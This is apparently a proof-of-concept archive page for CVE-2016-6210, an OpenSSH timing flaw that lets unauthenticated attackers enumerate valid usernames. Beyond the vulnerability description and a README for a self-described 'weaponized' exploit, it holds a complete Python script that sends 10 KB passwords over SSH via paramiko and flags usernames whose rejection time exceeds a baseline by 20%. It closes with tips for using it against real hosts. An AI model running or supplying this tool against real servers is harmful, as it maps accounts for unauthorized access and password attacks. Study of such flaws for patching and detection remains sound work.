POC details: 9a133f5cf70ca7a04a46efcfba949777adc18471

Source
Related vulnerability
Title: OpenSSH information disclosure vulnerability (CVE-2016-6210)
Description: OpenSSH (OpenBSD Secure Shell) is a set of connectivity tools from the Canadian OpenBSD project for securely accessing remote computers. It is the open-source implementation of the SSH protocol; it encrypts all traffic, which effectively blocks eavesdropping, connection hijacking and other network-level attacks. sshd in OpenSSH versions before 7.3 has an information disclosure vulnerability: the time sshd takes to reject a long password differs between existing and non-existing accounts, depending on the password hashing algorithm in use on the server. An unauthenticated remote attacker can use this timing difference to enumerate valid usernames on the affected system.
Description
OpenSSH Username Enumeration - CVE-2016-6210
Introduction
## This is the first version of the "weaponized" exploit for `CVE-2016-6210`

### Background:
Posted by Eddie Harari on Full Disclosure 
http://seclists.org/fulldisclosure/2016/Jul/51

###### The brief:
>By sending large passwords, a remote user can enumerate users on a system that runs SSHD. This problem exists in most
>modern configurations due to the fact that it takes much longer to calculate a SHA256/SHA512 hash than a BLOWFISH hash.

###### The (more) technical:
>When SSHD tries to authenticate a non-existing user, it will pick up a fake password structure hardcoded in the SSHD
>source code. On this hardcoded password structure the password hash is based on the BLOWFISH ($2) algorithm.
>If real users' passwords are hashed using SHA256/SHA512, then sending large passwords (10KB) will result in a shorter
>response time from the server for non-existing users.

**NOTE: Mr. Harari tested this on `opensshd-7.2p2`, while my testing was done on `OpenSSH_6.9p1`.**

The script works from the relative deviation between the response times for valid and invalid usernames, which in practice falls in a 10-30% range. Currently only usernames whose timing deviates by more than 20% from the invalid-user baseline are accepted as valid and appended to the output list (feel free to tweak this threshold within the script). This has proved effective for me.
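The measurement and the >20% threshold described above, as an added example that is not the project's own `ssh_enum.py` or `ssh_enum.c`: each candidate username gets several password attempts with a 10 KB password, the baseline is the median time for a few random (non-existent) usernames, and a candidate is reported as valid when its median time exceeds the baseline by more than the threshold. The network probe uses the `paramiko` library (assumed to be installed; imported lazily so the analysis part runs offline); `simulated_probe` is a constructed stand-in for a server where valid users take about 50% longer, and the host address, user names and timings are invented for illustration.

```python
"""Timing-based username enumeration in the style of CVE-2016-6210.

Added example, not the project's ssh_enum.py. Only sshd before OpenSSH 7.3
with SHA256/SHA512 password hashes is expected to show the difference.
"""
import random
import statistics
import string
import time

# The reporter used roughly 10 KB passwords so that server-side hashing
# dominates the response time.
LONG_PASSWORD = "A" * 10_000
# README threshold: more than 20% slower than the baseline means "valid".
THRESHOLD = 0.20


def random_username(length=12):
    """A username that almost certainly does not exist, used for the baseline."""
    return "".join(random.choice(string.ascii_lowercase) for _ in range(length))


def timed_password_auth(host, username, password, port=22, timeout=10.0):
    """Seconds sshd took to reject one password attempt (needs network + paramiko).

    A fresh transport is opened per attempt so every measurement starts from
    the same state; only the auth exchange itself is timed.
    """
    import paramiko  # lazy import: the offline analysis below has no dependency on it

    transport = paramiko.Transport((host, port))
    transport.banner_timeout = timeout
    try:
        transport.start_client(timeout=timeout)
        start = time.monotonic()
        try:
            transport.auth_password(username, password, fallback=False)
        except paramiko.AuthenticationException:
            pass  # expected: we only care how long the rejection took
        return time.monotonic() - start
    finally:
        transport.close()


def median_timing(probe, host, username, samples=5):
    """Median of several attempts; the median is robust to a single slow RTT."""
    return statistics.median(probe(host, username, LONG_PASSWORD) for _ in range(samples))


def deviation(candidate_time, baseline_time):
    """Relative slowdown of a candidate against the non-existent-user baseline."""
    return (candidate_time - baseline_time) / baseline_time


def classify(timings, baseline_time, threshold=THRESHOLD):
    """Map {username: median_seconds} to {username: probably_valid}."""
    return {user: deviation(t, baseline_time) > threshold for user, t in timings.items()}


def enumerate_users(host, candidates, probe=timed_password_auth, samples=5, baseline_users=3):
    """Run the whole procedure: baseline from random users, then classify candidates."""
    baseline = statistics.median(
        median_timing(probe, host, random_username(), samples) for _ in range(baseline_users)
    )
    timings = {user: median_timing(probe, host, user, samples) for user in candidates}
    return classify(timings, baseline)


def simulated_probe(valid_users, base=0.10, slow_factor=1.5, jitter=0.005):
    """Constructed stand-in for timed_password_auth (no network).

    Valid users take slow_factor times longer; a little jitter imitates RTT noise.
    """
    def probe(host, username, password):
        seconds = base * (slow_factor if username in valid_users else 1.0)
        return seconds + random.uniform(-jitter, jitter)
    return probe


if __name__ == "__main__":
    # Offline demonstration against the constructed server model (203.0.113.10
    # is a documentation address, not a real target).
    probe = simulated_probe({"root", "alice"})
    print(enumerate_users("203.0.113.10", ["root", "alice", "nosuchuser"], probe=probe))
```

Before trusting a result against a real host, check the banner: OpenSSH 7.3 normalized the password-authentication delay, so a 7.3+ server gives no usable deviation and every candidate will cluster around the baseline. Keep the sample count high enough that network jitter stays well below the 10-30% band the README reports.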

* More information on the process/background: https://justifysecurity.com/blog/weaponizing-cve-2016-6210/

`Bringing this project over to Github from Bitbucket.`
File snapshot

[4.0K] /data/pocs/9a133f5cf70ca7a04a46efcfba949777adc18471
├── [1.4K] README.md
├── [5.9K] ssh_enum.c
└── [3.5K] ssh_enum.py

0 directories, 3 files
Cached for you by the Shenlong bot
Notes
    1. Prefer accessing the POC through the source link.
    2. If the source is gone or unreachable, email f.jinxu#gmail.com to request the local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.